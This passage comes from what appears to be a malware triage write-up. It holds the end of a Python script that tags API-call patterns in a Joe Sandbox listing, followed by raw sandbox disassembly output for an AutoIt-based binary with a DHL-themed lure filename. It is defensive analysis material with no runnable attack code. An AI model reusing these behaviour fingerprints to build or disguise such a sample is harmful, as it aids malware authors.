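  • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000), ref: 008152BC
• GetCursorPos.USER32(?), ref: 0082713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00827199
"""

# One bullet: optional "Part of subcall function X:" prefix, Api.Module, an optional
# "(args)," group (GetDesktopWindow above has none), then "ref: address".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
PROCESS_ALL_ACCESS = 0x1F0FFF  # OpenProcess dwDesiredAccess seen in the listing
WM_CLOSE = 0x0010              # message id passed to PostMessageW/SendMessageTimeoutW

@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # int for hex literals, None for "?" (unresolved by the sandbox)
    ref: int
    subcall_of: "int | None" = None

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    api_id: str = ""

def _parse_args(raw):
    if not raw:
        return []
    return [None if t.strip() == "?" else int(t, 16) for t in raw.split(",")]

def parse_functions(text):
    """Split the listing at each 'APIs' header and collect that function's calls."""
    entries, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]),
                                     int(m["ref"], 16), sub))
        elif stripped.startswith("• API ID:"):
            cur.api_id = stripped.split(":", 1)[1].strip()
    return entries

def classify(entry):
    """Hand-written rules over one function's calls; tag names are this example's own."""
    names = {c.name for c in entry.calls}
    tags = []
    opens_all = any(c.name == "OpenProcess" and c.args and c.args[0] == PROCESS_ALL_ACCESS
                    for c in entry.calls)
    sends_close = any(c.name in ("PostMessageW", "SendMessageW", "SendMessageTimeoutW")
                      and len(c.args) > 1 and c.args[1] == WM_CLOSE for c in entry.calls)
    if opens_all and "TerminateProcess" in names:
        tags.append("wm_close_then_terminate_all_access" if sends_close
                    else "terminate_process_all_access")
    if "CreateProcessWithLogonW" in names:
        tags.append("create_process_with_logon")
    if "mouse_event" in names:
        tags.append("synthetic_mouse_input")
    return tags

def triage(text):
    """Tags per entry keyed by the first call's address; untagged entries are dropped."""
    return {f"{e.calls[0].ref:08X}": classify(e)
            for e in parse_functions(text) if e.calls and classify(e)}
```

Running `triage(SAMPLE)` yields three keyed entries (008085E2, 008153F9, 008270AC). One caveat when reading the output against this sample: the WM_CLOSE, then OpenProcess(PROCESS_ALL_ACCESS), then TerminateProcess shape, and the CreateProcessWithLogonW plus CreateEnvironmentBlock pairing, are consistent with the built-in window-kill and run-as helpers of the AutoIt interpreter, which the report already identifies this binary as being built on. Their presence in the runtime says little by itself; the useful question for triage is whether the embedded script actually reaches them, which this listing alone cannot answer.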
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00817243
• EnterCriticalSection.KERNEL32(?,?,007C0EE4,?,?), ref: 00817254
• TerminateThread.KERNEL32(00000000,000001F6,?,007C0EE4,?,?), ref: 00817261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,007C0EE4,?,?), ref: 0081726E
  • Part of subcall function 00816C35: CloseHandle.KERNEL32(00000000,?,0081727B,?,007C0EE4,?,?), ref: 00816C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00817281
• LeaveCriticalSection.KERNEL32(?,?,007C0EE4,?,?), ref: 00817288
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
• Instruction ID: cb8e8bc782d952c5148766ed1fe39e2fe01ea14ec79e5b997564bfa88daf077c
• Opcode Fuzzy Hash: 4247c924159d192bf9ad8d3df281447ee24c1e07495192ac436f4bf8e98e7d9f
• Instruction Fuzzy Hash: 6BF08236940612EBE7122B64ED4CDDB777AFF89702B100935F743D10A2DBBA5855CB90
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0080899D
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 008089A9
                                                                                    • CloseHandle.KERNEL32(?), ref: 008089B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 008089BA
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008089C3
                                                                                    • HeapFree.KERNEL32(00000000), ref: 008089CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                                                                                    • Instruction ID: ff923ee3af25bef5a8f45304f237921c488d8498cbaab7d9c1e8f30babbc456d
                                                                                    • Opcode Fuzzy Hash: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                                                                                    • Instruction Fuzzy Hash: 56E0C236404001FBDA022FE2EC0CD0ABB69FBC9322B108A30F31981171CB329424DB90
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00828613
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00828722
                                                                                    • VariantClear.OLEAUT32(?), ref: 0082889A
                                                                                      • Part of subcall function 00817562: VariantInit.OLEAUT32(00000000), ref: 008175A2
                                                                                      • Part of subcall function 00817562: VariantCopy.OLEAUT32(00000000,?), ref: 008175AB
                                                                                      • Part of subcall function 00817562: VariantClear.OLEAUT32(00000000), ref: 008175B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: 305aa60b3386b0916dc367d155258426a7246d6b0af996c95282b3a84ae241ca
                                                                                    • Instruction ID: 4d3b0cf2de571f182e87596d50900276db9f3c2cfe9a728b0f5f7ec0c7a4b2b5
                                                                                    • Opcode Fuzzy Hash: 305aa60b3386b0916dc367d155258426a7246d6b0af996c95282b3a84ae241ca
                                                                                    • Instruction Fuzzy Hash: 3F912571608305DFCB10DF24C48499ABBE4FF89714F14896EF99ACB262DB31E945CB92
                                                                                    APIs
                                                                                      • Part of subcall function 007CFC86: _wcscpy.LIBCMT ref: 007CFCA9
                                                                                    • _memset.LIBCMT ref: 00812B87
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00812BB6
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00812C69
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00812C97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 0e747cbf26e946cca7e966d311c767d49499e925e93d8fc26e3d1d062926f3d1
                                                                                    • Instruction ID: 089e766e6786045937de36f4eaeafa2ddb207beb3b60c62a7d48f32ddd83014a
                                                                                    • Opcode Fuzzy Hash: 0e747cbf26e946cca7e966d311c767d49499e925e93d8fc26e3d1d062926f3d1
                                                                                    • Instruction Fuzzy Hash: B851BF716083019FD7249F28D845AAFB7ECFF95320F040A2DF995D2291DB74CDA49792
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_free
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 2620147621-1588047251
                                                                                    • Opcode ID: 0022003fa891d22516aa9de9f2b4fa2ef04b2d5ac320361585008637ef39747c
                                                                                    • Instruction ID: 0a966761f3327fdb0ddf07aaa4490540dbc060bed9af3b6051784dddd77e0336
                                                                                    • Opcode Fuzzy Hash: 0022003fa891d22516aa9de9f2b4fa2ef04b2d5ac320361585008637ef39747c
                                                                                    • Instruction Fuzzy Hash: D6515C716047418FDB29CF28C450B6EBBF5BF85314F44892DE99987351E739E901CB82
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$_memmove
                                                                                    • String ID: 3c|$ERCP
                                                                                    • API String ID: 2532777613-4015162898
                                                                                    • Opcode ID: 0f99e0a635f238af41b0273c455d7142fbfd881b67d851306655d89a4e7a48ca
                                                                                    • Instruction ID: 63d9ad42eb1ffdd876964495b7300335da26eff8131f693ec542349a7f41a5e2
                                                                                    • Opcode Fuzzy Hash: 0f99e0a635f238af41b0273c455d7142fbfd881b67d851306655d89a4e7a48ca
                                                                                    • Instruction Fuzzy Hash: 7851B070A00309DBDB24CFA5C985BAAB7F4FF04304F20456EE94ACB281E774EA44CB50
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0080D5D4
                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0080D60A
                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0080D61B
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0080D69D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                    • String ID: DllGetClassObject
                                                                                    • API String ID: 753597075-1075368562
                                                                                    • Opcode ID: 036d66b9056c67dc27efe800ce1a4f456201942d0792610b60129de13d16b3ec
                                                                                    • Instruction ID: 8ce06f23b3cc4c3ff87faece72ae05314bf5c73b94f527e81036767e8d20ac25
                                                                                    • Opcode Fuzzy Hash: 036d66b9056c67dc27efe800ce1a4f456201942d0792610b60129de13d16b3ec
                                                                                    • Instruction Fuzzy Hash: F5418BB1600304EFDB45CFA4CC84A9ABBA9FF54314F1181A9A909DF286D7B2D944CBE0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 008127C0
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008127DC
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00812822
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00875890,00000000), ref: 0081286B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1173514356-4108050209
                                                                                    • Opcode ID: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                                                                                    • Instruction ID: ba4a2c603cd9b55beca8205aaf29cea767e54655566420c5a006be2503b9fe80
                                                                                    • Opcode Fuzzy Hash: 430585f5f2b3c4a493658e9baa9a85cdba38b1c879cb24f2d91fc295c7063ac4
                                                                                    • Instruction Fuzzy Hash: 5141AE716043419FDB24DF28C844B9ABBE8FF85314F04492DF9A6D72D2D730A855CB52
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082D7C5
                                                                                      • Part of subcall function 007B784B: _memmove.LIBCMT ref: 007B7899
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower_memmove
                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                    • API String ID: 3425801089-567219261
                                                                                    • Opcode ID: 3d32b102fcb65d8cd8e58f209a12935697c4b52a9c32fd3a0b977110438e3f0f
                                                                                    • Instruction ID: 675197595120c6d6ac40e483eefbeba47b2fde111fd3968afdab4525d0eaa84e
                                                                                    • Opcode Fuzzy Hash: 3d32b102fcb65d8cd8e58f209a12935697c4b52a9c32fd3a0b977110438e3f0f
                                                                                    • Instruction Fuzzy Hash: 1931AF71A04219EBCF04EF58C855AEEB7B4FF44324B108A2AE875D77D1DB71A949CB80
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00808F14
                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00808F27
                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00808F57
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 365058703-1403004172
                                                                                    • Opcode ID: 5e9ea140068764b21b35a6ec5a52cbd64aee1059582b8a8ffae2ee4e9fffe2c0
                                                                                    • Instruction ID: 4b25ced4b167962c5fe28a1c40c778ac2f39f700707891280278f01e4530c760
                                                                                    • Opcode Fuzzy Hash: 5e9ea140068764b21b35a6ec5a52cbd64aee1059582b8a8ffae2ee4e9fffe2c0
                                                                                    • Instruction Fuzzy Hash: C221F271A00109FADB18ABB0CC4AEFFB769EF55360F044529F461E72E1DE390849DA50
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0082184C
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00821872
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008218A2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008218E9
                                                                                      • Part of subcall function 00822483: GetLastError.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 00822498
                                                                                      • Part of subcall function 00822483: SetEvent.KERNEL32(?,?,00821817,00000000,00000000,00000001), ref: 008224AD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    • Opcode ID: 782c5e0e7c319f8d3fdf303ac7114d512fb57213027c8eb787d1e2b9a6b4b8e4
                                                                                    • Instruction ID: a157611a7e50ae48540bab876330d8e6c5ee0b0fda45364a804cf58505eb1501
                                                                                    • Opcode Fuzzy Hash: 782c5e0e7c319f8d3fdf303ac7114d512fb57213027c8eb787d1e2b9a6b4b8e4
                                                                                    • Instruction Fuzzy Hash: 6D21D0B1500318BFEB119B64ECC9EBB77ECFB99744F20413AF905D2240EA218D4497A1
                                                                                    APIs
                                                                                      • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
                                                                                      • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
                                                                                      • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00836461
                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00836468
                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0083647D
                                                                                    • DestroyWindow.USER32(?), ref: 00836485
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                    • String ID: SysAnimate32
                                                                                    • API String ID: 4146253029-1011021900
                                                                                    • Opcode ID: 82835b78f6896db152fa763603c985c225198ea3ca9b1579966f22cf429b7a50
                                                                                    • Instruction ID: a024d2aa0ca8286e5667c64c66a90ec12ba411ead33af6be7c82178aec988a5f
                                                                                    • Opcode Fuzzy Hash: 82835b78f6896db152fa763603c985c225198ea3ca9b1579966f22cf429b7a50
                                                                                    • Instruction Fuzzy Hash: 84218E71A00205BBEF104F68EC44EBA77ADFB99368F108629FA10D6191E771DC6197A4
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00816DBC
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00816DEF
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00816E01
                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00816E3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: 04155d38abb30a3b6eef693419ebbfb218621c68ab264e4f34e771327ebd2096
                                                                                    • Instruction ID: 181400c07c6af9c355068cd10ac6f14c277bcb1bd8cf8117a1d814cabc0acbf7
                                                                                    • Opcode Fuzzy Hash: 04155d38abb30a3b6eef693419ebbfb218621c68ab264e4f34e771327ebd2096
                                                                                    • Instruction Fuzzy Hash: C7215175600209ABDB209F29EC05ADA77E8FF84760F204A19FDE1D72D0E77199A4DB50
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00816E89
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00816EBB
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00816ECC
                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00816F06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$FilePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 4209266947-2873401336
                                                                                    • Opcode ID: db8e7db3d5f615a4e0de9d1c443741abf06f6e90ad404c73abd9f0dc21049ffb
                                                                                    • Instruction ID: e6a5307d480f815a3ca5a4980b19c8d603c5144733ebbf3608e460951059cb83
                                                                                    • Opcode Fuzzy Hash: db8e7db3d5f615a4e0de9d1c443741abf06f6e90ad404c73abd9f0dc21049ffb
